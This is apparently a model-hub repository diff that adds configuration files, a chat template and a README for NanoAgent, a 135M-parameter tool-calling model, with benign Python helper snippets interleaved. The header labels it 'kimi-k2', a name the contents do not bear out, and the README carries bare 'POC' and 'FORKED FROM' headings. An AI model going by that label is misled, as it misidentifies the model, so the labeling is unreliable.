Initialize project; model provided by the ModelHub XC community
Model: applexml/kimi-k2
Source: Original Platform
.gitattributes (vendored, Normal file, 36 lines)
@@ -0,0 +1,36 @@
*.7z filter=lfs diff=lfs merge=lfs -text
*.arrow filter=lfs diff=lfs merge=lfs -text
*.bin filter=lfs diff=lfs merge=lfs -text
*.bz2 filter=lfs diff=lfs merge=lfs -text
*.ckpt filter=lfs diff=lfs merge=lfs -text
*.ftz filter=lfs diff=lfs merge=lfs -text
*.gz filter=lfs diff=lfs merge=lfs -text
*.h5 filter=lfs diff=lfs merge=lfs -text
*.joblib filter=lfs diff=lfs merge=lfs -text
*.lfs.* filter=lfs diff=lfs merge=lfs -text
*.mlmodel filter=lfs diff=lfs merge=lfs -text
*.model filter=lfs diff=lfs merge=lfs -text
*.msgpack filter=lfs diff=lfs merge=lfs -text
*.npy filter=lfs diff=lfs merge=lfs -text
*.npz filter=lfs diff=lfs merge=lfs -text
*.onnx filter=lfs diff=lfs merge=lfs -text
*.ot filter=lfs diff=lfs merge=lfs -text
*.parquet filter=lfs diff=lfs merge=lfs -text
*.pb filter=lfs diff=lfs merge=lfs -text
*.pickle filter=lfs diff=lfs merge=lfs -text
*.pkl filter=lfs diff=lfs merge=lfs -text
*.pt filter=lfs diff=lfs merge=lfs -text
*.pth filter=lfs diff=lfs merge=lfs -text
*.rar filter=lfs diff=lfs merge=lfs -text
*.safetensors filter=lfs diff=lfs merge=lfs -text
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
*.tar.* filter=lfs diff=lfs merge=lfs -text
*.tar filter=lfs diff=lfs merge=lfs -text
*.tflite filter=lfs diff=lfs merge=lfs -text
*.tgz filter=lfs diff=lfs merge=lfs -text
*.wasm filter=lfs diff=lfs merge=lfs -text
*.xz filter=lfs diff=lfs merge=lfs -text
*.zip filter=lfs diff=lfs merge=lfs -text
*.zst filter=lfs diff=lfs merge=lfs -text
*tfevents* filter=lfs diff=lfs merge=lfs -text
model.gguf filter=lfs diff=lfs merge=lfs -text
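You can approximate these patterns in Python to see which repository files will go through Git LFS. This is a sketch, not Git's own matcher. It assumes the gitignore-style rule that a pattern without a slash is matched against the file's basename at any depth. It uses `fnmatch.fnmatchcase`, which only roughly imitates Git's `**` handling. For the authoritative answer, run `git check-attr filter -- <path>`.

```python
from fnmatch import fnmatchcase
from pathlib import PurePosixPath

# Patterns copied from the .gitattributes above (every one sets filter=lfs).
LFS_PATTERNS = [
    "*.7z", "*.arrow", "*.bin", "*.bz2", "*.ckpt", "*.ftz", "*.gz", "*.h5",
    "*.joblib", "*.lfs.*", "*.mlmodel", "*.model", "*.msgpack", "*.npy",
    "*.npz", "*.onnx", "*.ot", "*.parquet", "*.pb", "*.pickle", "*.pkl",
    "*.pt", "*.pth", "*.rar", "*.safetensors", "saved_model/**/*", "*.tar.*",
    "*.tar", "*.tflite", "*.tgz", "*.wasm", "*.xz", "*.zip", "*.zst",
    "*tfevents*", "model.gguf",
]


def is_lfs_tracked(path: str) -> bool:
    """Approximate check: does any LFS pattern match this repo-relative path?"""
    posix = PurePosixPath(path)
    for pattern in LFS_PATTERNS:
        if "/" in pattern:
            # Patterns containing a slash are matched against the whole path.
            # fnmatch's "*" also matches "/", so Git's "**" is only approximated.
            if fnmatchcase(str(posix), pattern):
                return True
        elif fnmatchcase(posix.name, pattern):
            # Slash-free patterns match the basename at any directory depth.
            return True
    return False


for name in ["model.safetensors", "config.json", "merges.txt", "runs/events.out.tfevents.1"]:
    print(name, is_lfs_tracked(name))
```

With these rules, `model.safetensors` and the TensorBoard event file are routed to LFS. `config.json` and `merges.txt` stay as ordinary Git blobs.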
Modelfile (Normal file, 25 lines)
@@ -0,0 +1,25 @@
TEMPLATE """{{- if .Messages }}
{{- if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}
{{- range $i, $_ := .Messages }}
{{- $last := eq (len (slice $.Messages $i)) 1 -}}
{{- if eq .Role "user" }}<|im_start|>user
{{ .Content }}<|im_end|>
{{ else if eq .Role "assistant" }}<|im_start|>assistant
{{ .Content }}{{ if not $last }}<|im_end|>
{{ end }}
{{- end }}
{{- if and (ne .Role "assistant") $last }}<|im_start|>assistant
{{ end }}
{{- end }}
{{- else }}
{{- if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}{{ if .Prompt }}<|im_start|>user
{{ .Prompt }}<|im_end|>
{{ end }}<|im_start|>assistant
{{ end }}{{ .Response }}{{ if .Response }}<|im_end|>{{ end }}"""
SYSTEM You are a helpful AI assistant.
PARAMETER stop <|im_start|>
PARAMETER stop <|im_end|>
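In its chat (`.Messages`) branch, the Go template above emits standard ChatML. The function below is a hand translation of that branch, useful for checking prompts outside Ollama. It is an illustration only, and it makes three assumptions:

- Messages are dicts with `role` and `content` keys.
- The system prompt is passed separately. By default this is the `SYSTEM` line above.
- Behavior mirrors the template: roles other than `user` and `assistant` are skipped, and a trailing assistant turn is left open so the model continues it.

`render_chatml` is a hypothetical helper name.

```python
def render_chatml(messages, system="You are a helpful AI assistant."):
    """Hand translation of the Modelfile's .Messages branch (illustrative only)."""
    parts = []
    if system:
        parts.append(f"<|im_start|>system\n{system}<|im_end|>\n")
    for i, msg in enumerate(messages):
        last = i == len(messages) - 1
        role, content = msg["role"], msg["content"]
        if role == "user":
            parts.append(f"<|im_start|>user\n{content}<|im_end|>\n")
        elif role == "assistant":
            parts.append(f"<|im_start|>assistant\n{content}")
            if not last:
                # Completed assistant turns are closed; a trailing one stays open.
                parts.append("<|im_end|>\n")
        if role != "assistant" and last:
            # Open an assistant turn for the model to generate into.
            parts.append("<|im_start|>assistant\n")
    return "".join(parts)


print(render_chatml([{"role": "user", "content": "Hi! Do you have a name?"}]))
```

Generation stops at `<|im_end|>` or `<|im_start|>` because of the two `PARAMETER stop` lines.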
README.md (Normal file, 151 lines)
@@ -0,0 +1,151 @@
---
language:
- en
license: apache-2.0
tags:
- llm
- tool-calling
- lightweight
- agentic-tasks
- react
- mlx
model-index:
- name: NanoAgent
  results: []
datasets:
- microsoft/orca-agentinstruct-1M-v1
- microsoft/orca-math-word-problems-200k
- allenai/tulu-3-sft-personas-instruction-following
- xingyaoww/code-act
- m-a-p/Code-Feedback
- weijie210/gsm8k_decomposed
- Locutusque/function-calling-chatml
- HuggingFaceTB/smoltalk
base_model:
- HuggingFaceTB/SmolLM2-135M-Instruct
pipeline_tag: text-generation
---

# POC

# FORKED FROM

# 🧠 NanoAgent: 135M-Parameter Agentic LLM

NanoAgent is a compact language model with 135M parameters and an 8k-token context window, trained to **perform tool calls** and **generate responses based on tool outputs**.

Despite its small size (~135 MB in 8-bit precision), it is optimized for agentic use cases and runs easily on personal devices.

**GitHub:** [NanoAgent](https://github.com/QuwsarOhi/NanoAgent)

**Inference notebook:** [inference.ipynb](https://github.com/QuwsarOhi/NanoAgent/blob/main/notebooks/inference.ipynb)

---

## ✨ Features

- 🧰 **Tool Calling**: produces structured tool calls and responds based on their outputs.
- 🧭 **Instruction Following**: strong instruction-following abilities.
- 🧠 **Basic Reasoning**: handles lightweight reasoning and ReAct-style interactions.
- ⚡ **Lightweight**: runs on local hardware with minimal resources.

---

## 🧪 Training Overview

- **Base model:** [`SmolLM2-135M-Instruct`](https://huggingface.co/HuggingFaceTB/SmolLM2-135M-Instruct)
- **Fine-tuning method:** [Dynamic Fine-Tuning (DFT)](https://github.com/yongliang-wu/DFT/tree/master)
- **Hardware:** Apple M1 Mac with 16 GB unified memory, trained with MLX
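
As we read the linked DFT work, Dynamic Fine-Tuning keeps the supervised target tokens of ordinary SFT. What changes is the weighting: each token's negative log-likelihood is multiplied by the model's own probability for that token, and that weight is detached from the gradient (stop-gradient). The sketch below only compares the two loss values for a hypothetical list of per-token probabilities. It is not the training code used for this model, and averaging over tokens is an assumption.

```python
import math


def sft_loss(token_probs):
    """Standard SFT: mean negative log-likelihood of the target tokens."""
    return -sum(math.log(p) for p in token_probs) / len(token_probs)


def dft_loss(token_probs):
    """DFT-style loss: each token's NLL is scaled by that token's probability.

    In an autodiff framework the scale factor p would be detached
    (stop-gradient), so it reweights the gradient without being optimized.
    """
    return -sum(p * math.log(p) for p in token_probs) / len(token_probs)


probs = [0.9, 0.5, 0.05]  # hypothetical per-token probabilities
print(f"SFT: {sft_loss(probs):.3f}  DFT: {dft_loss(probs):.3f}")
```

Low-probability tokens contribute much less under the DFT weighting. For example, a token with p = 0.05 has an NLL of about 3.0 but a DFT term of about 0.15.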

### 📚 Datasets Used
- `microsoft/orca-agentinstruct-1M-v1`: agentic tasks, RAG answers, classification
- `microsoft/orca-math-word-problems-200k`: lightweight reasoning
- `allenai/tulu-3-sft-personas-instruction-following`: instruction following
- `xingyaoww/code-act`: ReAct-style reasoning and action
- `m-a-p/Code-Feedback`: alignment via feedback
- `HuggingFaceTB/smoltalk` + `/apigen`: tool-calling stabilization
- `weijie210/gsm8k_decomposed`: question decomposition
- `Locutusque/function-calling-chatml`: tool-call response structure

---

## ⚠️ Disclaimer

This is a **beta model**.

- It may produce **incorrect** or **incomplete** outputs.
- Tool call execution is **basic** and can fail in some cases.
- It is intended for **research and experimentation** only, not for production use.

---

## 🧭 Roadmap

- ✅ Initial release with DFT fine-tuning
- 🧪 Benchmarking on agentic tasks
- ~~🔬 Experimenting with GRPO for tool calling (failed)~~
- 🧠 Weight merging experiments for improved performance
- Add more tool-calling datasets

---

## 📥 Model Size

- 135M parameters
- ~135 MB in 8-bit precision
- 8k context length
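
The ~135 MB figure follows from storing one byte per parameter. As a rough sketch, you can estimate the weight footprint at other precisions from the `total_parameters` value (134,515,008) recorded in `model.safetensors.index.json`. This counts weights only and ignores quantization scales, the KV cache, and activations. `weight_megabytes` is a hypothetical helper.

```python
TOTAL_PARAMS = 134_515_008  # "total_parameters" in model.safetensors.index.json


def weight_megabytes(params: int, bits_per_param: int) -> float:
    """Weight storage only, in decimal megabytes (1 MB = 10**6 bytes)."""
    return params * bits_per_param / 8 / 1e6


for label, bits in [("bf16", 16), ("8-bit", 8), ("4-bit", 4)]:
    print(f"{label}: {weight_megabytes(TOTAL_PARAMS, bits):.1f} MB")
```

This prints the following:

- 269.0 MB for bf16, matching the index's `total_size` of 269,030,016 bytes.
- 134.5 MB for 8-bit.
- 67.3 MB for 4-bit.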

---

## ⚡ Example Usage

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = "quwsarohi/NanoAgent-135M"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)


def inference(messages, max_new_tokens=256, temperature=0.3, min_p=0.15, **kwargs):
    # Render the conversation with the chat template and open an assistant turn.
    input_text = tokenizer.apply_chat_template(
        messages, tokenize=False, add_generation_prompt=True
    )
    inputs = tokenizer.encode(input_text, return_tensors="pt")
    outputs = model.generate(
        inputs,
        max_new_tokens=max_new_tokens,
        do_sample=True,
        min_p=min_p,
        temperature=temperature,
        **kwargs
    )
    # Decode only the newly generated tokens, not the prompt.
    return tokenizer.decode(outputs[0][inputs.shape[1] :], skip_special_tokens=True)


messages = [{"role": "user", "content": "Hi! Do you have a name?"}]
print(inference(messages))
```

Use the following template for tool calling:

```python
TOOL_TEMPLATE = """You are a helpful AI assistant. You have a set of possible functions/tools inside <tools></tools> tags.
Based on question, you may need to make one or more function/tool calls to answer user.

You have access to the following tools/functions:
<tools>{tools}</tools>

For each function call, return a JSON list object with function name and arguments within <tool_call></tool_call> tags."""
```
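
Here is a minimal sketch of filling the template. The README does not spell out either of these choices, so both are assumptions:

- The tool list is serialized with `json.dumps`.
- The rendered text is sent as the system message.

The tool schema is the sample `web_search` definition from this README. `build_tool_messages` is a hypothetical helper name.

```python
import json

# Copied verbatim from the README's TOOL_TEMPLATE.
TOOL_TEMPLATE = """You are a helpful AI assistant. You have a set of possible functions/tools inside <tools></tools> tags.
Based on question, you may need to make one or more function/tool calls to answer user.

You have access to the following tools/functions:
<tools>{tools}</tools>

For each function call, return a JSON list object with function name and arguments within <tool_call></tool_call> tags."""

WEB_SEARCH_TOOL = {
    "name": "web_search",
    "description": "Performs a web search for a query and returns a string of the top search results formatted as markdown with titles, links, and descriptions.",
    "parameters": {
        "type": "object",
        "properties": {
            "query": {"type": "string", "description": "The search query to perform."}
        },
        "required": ["query"],
    },
}


def build_tool_messages(user_query, tools):
    """Hypothetical helper: render the tool list into the system prompt."""
    system_prompt = TOOL_TEMPLATE.format(tools=json.dumps(tools))
    return [
        {"role": "system", "content": system_prompt},
        {"role": "user", "content": user_query},
    ]


messages = build_tool_messages("Search the web for MLX documentation.", [WEB_SEARCH_TOOL])
```

You can then pass the resulting `messages` list to the `inference` function from the usage example above. Because the first message already has the `system` role, the chat template does not insert its default system prompt.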

Sample tool definition:

```json
{
  "name": "web_search",
  "description": "Performs a web search for a query and returns a string of the top search results formatted as markdown with titles, links, and descriptions.",
  "parameters": {
    "type": "object",
    "properties": {
      "query": {
        "type": "string",
        "description": "The search query to perform."
      }
    },
    "required": ["query"]
  }
}
```
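
On the output side, the template asks the model to wrap its calls in `<tool_call></tool_call>` tags as a JSON list. Below is a minimal parser sketch. The README shows no sample response, so the sketch assumes each call is an object with `name` and `arguments` keys. Because tool calling can fail, it skips blocks that are not valid JSON instead of raising. `parse_tool_calls` is a hypothetical helper.

```python
import json
import re

TOOL_CALL_RE = re.compile(r"<tool_call>(.*?)</tool_call>", re.DOTALL)


def parse_tool_calls(text):
    """Extract (name, arguments) pairs from model output (key names are assumed)."""
    calls = []
    for block in TOOL_CALL_RE.findall(text):
        try:
            payload = json.loads(block)
        except json.JSONDecodeError:
            continue  # malformed output from the model; skip this block
        # Accept either a single object or a list of objects.
        items = payload if isinstance(payload, list) else [payload]
        for item in items:
            if isinstance(item, dict) and "name" in item:
                calls.append((item["name"], item.get("arguments", {})))
    return calls


sample = '<tool_call>[{"name": "web_search", "arguments": {"query": "MLX"}}]</tool_call>'
print(parse_tool_calls(sample))
```

For the sample string this prints `[('web_search', {'query': 'MLX'})]`. Your application would execute the call and append the result to the conversation before generating again.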
chat_template.jinja (Normal file, 11 lines)
@@ -0,0 +1,11 @@
{% for message in messages %}
{% if loop.first and messages[0]['role'] != 'system' %}
{{ '<|im_start|>system
You are a helpful AI assistant. <|im_end|>' }}
{% endif %}
{{'<|im_start|>' + message['role'] + '
' + message['content'] + '<|im_end|>'}}
{% endfor %}
{% if add_generation_prompt %}
{{ '<|im_start|>assistant' }}
{% endif %}
config.json (Normal file, 38 lines)
@@ -0,0 +1,38 @@
{
  "architectures": [
    "LlamaForCausalLM"
  ],
  "attention_bias": false,
  "attention_dropout": 0.0,
  "bos_token_id": 1,
  "eos_token_id": 2,
  "head_dim": 64,
  "hidden_act": "silu",
  "hidden_size": 576,
  "initializer_range": 0.041666666666666664,
  "intermediate_size": 1536,
  "is_llama_config": true,
  "max_position_embeddings": 8192,
  "mlp_bias": false,
  "model_type": "llama",
  "num_attention_heads": 9,
  "num_hidden_layers": 30,
  "num_key_value_heads": 3,
  "pad_token_id": 2,
  "pretraining_tp": 1,
  "rms_norm_eps": 1e-05,
  "rope_interleaved": false,
  "rope_scaling": null,
  "rope_theta": 100000,
  "tie_word_embeddings": true,
  "torch_dtype": "bfloat16",
  "transformers.js_config": {
    "kv_cache_dtype": {
      "fp16": "float16",
      "q4f16": "float16"
    }
  },
  "transformers_version": "4.55.4",
  "use_cache": true,
  "vocab_size": 49152
}
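The hyperparameters above are enough to reproduce the parameter count recorded in `model.safetensors.index.json`. The sketch below assumes the standard Llama layout implied by this config:

- Grouped-query attention with `num_key_value_heads` K/V heads.
- A gated SiLU MLP (gate, up, and down projections).
- No biases, since `attention_bias` and `mlp_bias` are false.
- Two RMSNorm weight vectors per layer plus a final norm.
- An output head tied to the input embeddings, since `tie_word_embeddings` is true.

`llama_param_count` is a hypothetical helper, not a transformers API.

```python
CONFIG = {
    "hidden_size": 576,
    "intermediate_size": 1536,
    "num_attention_heads": 9,
    "num_key_value_heads": 3,
    "head_dim": 64,
    "num_hidden_layers": 30,
    "vocab_size": 49152,
    "tie_word_embeddings": True,
}


def llama_param_count(cfg):
    h, head_dim = cfg["hidden_size"], cfg["head_dim"]
    q_dim = cfg["num_attention_heads"] * head_dim   # 9 * 64 = 576
    kv_dim = cfg["num_key_value_heads"] * head_dim  # 3 * 64 = 192 (grouped-query attention)
    attention = h * q_dim + 2 * h * kv_dim + q_dim * h  # q, k, v, o projections
    mlp = 3 * h * cfg["intermediate_size"]              # gate, up, down projections
    norms = 2 * h                                       # input and post-attention RMSNorm
    embeddings = cfg["vocab_size"] * h
    lm_head = 0 if cfg["tie_word_embeddings"] else embeddings
    final_norm = h
    per_layer = attention + mlp + norms
    return embeddings + cfg["num_hidden_layers"] * per_layer + final_norm + lm_head


total = llama_param_count(CONFIG)
print(total, total * 2)  # bfloat16 stores 2 bytes per parameter
```

This yields 134,515,008 parameters and 269,030,016 bytes, matching `total_parameters` and `total_size` in the index. The embedding table alone accounts for about 28.3M of the parameters.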
generation_config.json (Normal file, 7 lines)
@@ -0,0 +1,7 @@
{
  "_from_model_config": true,
  "bos_token_id": 1,
  "eos_token_id": 1,
  "pad_token_id": 2,
  "transformers_version": "4.42.3"
}
merges.txt (Normal file, 48901 lines)
File diff suppressed because it is too large
model.safetensors (Normal file, 3 lines)
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:b788815ccc4faf78f3a7cdd527b4b2306884ddf73a3b770d63e3e791ebf23ca0
size 269060552
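This is a Git LFS pointer rather than the weights themselves. The real `model.safetensors` (269,060,552 bytes) is fetched from LFS storage. The short sketch below parses such a pointer and checks a downloaded file against its `oid` and `size`. It assumes the `key value` line format of the LFS v1 pointer spec with a `sha256:` oid. The function names are hypothetical.

```python
import hashlib

POINTER = """version https://git-lfs.github.com/spec/v1
oid sha256:b788815ccc4faf78f3a7cdd527b4b2306884ddf73a3b770d63e3e791ebf23ca0
size 269060552
"""


def parse_lfs_pointer(text):
    """Split each 'key value' line of an LFS pointer into a dict."""
    fields = dict(line.split(" ", 1) for line in text.splitlines() if line.strip())
    algo, digest = fields["oid"].split(":", 1)
    return {"version": fields["version"], "algo": algo, "digest": digest, "size": int(fields["size"])}


def matches_pointer(path, pointer):
    """Stream the file in 1 MiB chunks and compare its size and SHA-256 with the pointer."""
    sha, size = hashlib.sha256(), 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            sha.update(chunk)
            size += len(chunk)
    return size == pointer["size"] and sha.hexdigest() == pointer["digest"]


pointer = parse_lfs_pointer(POINTER)
print(pointer["size"], pointer["digest"][:12])
```

After the real file is fetched, for example with `git lfs pull`, `matches_pointer("model.safetensors", pointer)` should return `True`.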
model.safetensors.index.json (Normal file, 280 lines)
@@ -0,0 +1,280 @@
{
  "metadata": {
    "total_size": 269030016,
    "total_parameters": 134515008
  },
  "weight_map": {
    "model.embed_tokens.weight": "model.safetensors",
    "model.layers.0.input_layernorm.weight": "model.safetensors",
    "model.layers.0.mlp.down_proj.weight": "model.safetensors",
    "model.layers.0.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.0.mlp.up_proj.weight": "model.safetensors",
    "model.layers.0.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.0.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.0.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.0.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.0.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.1.input_layernorm.weight": "model.safetensors",
    "model.layers.1.mlp.down_proj.weight": "model.safetensors",
    "model.layers.1.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.1.mlp.up_proj.weight": "model.safetensors",
    "model.layers.1.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.1.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.1.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.1.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.1.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.10.input_layernorm.weight": "model.safetensors",
    "model.layers.10.mlp.down_proj.weight": "model.safetensors",
    "model.layers.10.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.10.mlp.up_proj.weight": "model.safetensors",
    "model.layers.10.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.10.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.10.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.10.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.10.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.11.input_layernorm.weight": "model.safetensors",
    "model.layers.11.mlp.down_proj.weight": "model.safetensors",
    "model.layers.11.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.11.mlp.up_proj.weight": "model.safetensors",
    "model.layers.11.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.11.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.11.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.11.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.11.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.12.input_layernorm.weight": "model.safetensors",
    "model.layers.12.mlp.down_proj.weight": "model.safetensors",
    "model.layers.12.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.12.mlp.up_proj.weight": "model.safetensors",
    "model.layers.12.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.12.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.12.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.12.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.12.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.13.input_layernorm.weight": "model.safetensors",
    "model.layers.13.mlp.down_proj.weight": "model.safetensors",
    "model.layers.13.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.13.mlp.up_proj.weight": "model.safetensors",
    "model.layers.13.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.13.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.13.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.13.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.13.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.14.input_layernorm.weight": "model.safetensors",
    "model.layers.14.mlp.down_proj.weight": "model.safetensors",
    "model.layers.14.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.14.mlp.up_proj.weight": "model.safetensors",
    "model.layers.14.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.14.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.14.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.14.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.14.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.15.input_layernorm.weight": "model.safetensors",
    "model.layers.15.mlp.down_proj.weight": "model.safetensors",
    "model.layers.15.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.15.mlp.up_proj.weight": "model.safetensors",
    "model.layers.15.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.15.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.15.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.15.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.15.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.16.input_layernorm.weight": "model.safetensors",
    "model.layers.16.mlp.down_proj.weight": "model.safetensors",
    "model.layers.16.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.16.mlp.up_proj.weight": "model.safetensors",
    "model.layers.16.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.16.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.16.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.16.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.16.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.17.input_layernorm.weight": "model.safetensors",
    "model.layers.17.mlp.down_proj.weight": "model.safetensors",
    "model.layers.17.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.17.mlp.up_proj.weight": "model.safetensors",
    "model.layers.17.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.17.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.17.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.17.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.17.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.18.input_layernorm.weight": "model.safetensors",
    "model.layers.18.mlp.down_proj.weight": "model.safetensors",
    "model.layers.18.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.18.mlp.up_proj.weight": "model.safetensors",
    "model.layers.18.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.18.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.18.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.18.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.18.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.19.input_layernorm.weight": "model.safetensors",
    "model.layers.19.mlp.down_proj.weight": "model.safetensors",
    "model.layers.19.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.19.mlp.up_proj.weight": "model.safetensors",
    "model.layers.19.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.19.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.19.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.19.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.19.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.2.input_layernorm.weight": "model.safetensors",
    "model.layers.2.mlp.down_proj.weight": "model.safetensors",
    "model.layers.2.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.2.mlp.up_proj.weight": "model.safetensors",
    "model.layers.2.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.2.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.2.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.2.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.2.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.20.input_layernorm.weight": "model.safetensors",
    "model.layers.20.mlp.down_proj.weight": "model.safetensors",
    "model.layers.20.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.20.mlp.up_proj.weight": "model.safetensors",
    "model.layers.20.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.20.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.20.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.20.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.20.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.21.input_layernorm.weight": "model.safetensors",
    "model.layers.21.mlp.down_proj.weight": "model.safetensors",
    "model.layers.21.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.21.mlp.up_proj.weight": "model.safetensors",
    "model.layers.21.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.21.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.21.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.21.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.21.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.22.input_layernorm.weight": "model.safetensors",
    "model.layers.22.mlp.down_proj.weight": "model.safetensors",
    "model.layers.22.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.22.mlp.up_proj.weight": "model.safetensors",
    "model.layers.22.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.22.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.22.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.22.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.22.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.23.input_layernorm.weight": "model.safetensors",
    "model.layers.23.mlp.down_proj.weight": "model.safetensors",
    "model.layers.23.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.23.mlp.up_proj.weight": "model.safetensors",
    "model.layers.23.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.23.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.23.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.23.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.23.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.24.input_layernorm.weight": "model.safetensors",
    "model.layers.24.mlp.down_proj.weight": "model.safetensors",
    "model.layers.24.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.24.mlp.up_proj.weight": "model.safetensors",
    "model.layers.24.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.24.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.24.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.24.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.24.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.25.input_layernorm.weight": "model.safetensors",
    "model.layers.25.mlp.down_proj.weight": "model.safetensors",
    "model.layers.25.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.25.mlp.up_proj.weight": "model.safetensors",
    "model.layers.25.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.25.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.25.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.25.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.25.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.26.input_layernorm.weight": "model.safetensors",
    "model.layers.26.mlp.down_proj.weight": "model.safetensors",
    "model.layers.26.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.26.mlp.up_proj.weight": "model.safetensors",
    "model.layers.26.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.26.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.26.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.26.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.26.self_attn.v_proj.weight": "model.safetensors",
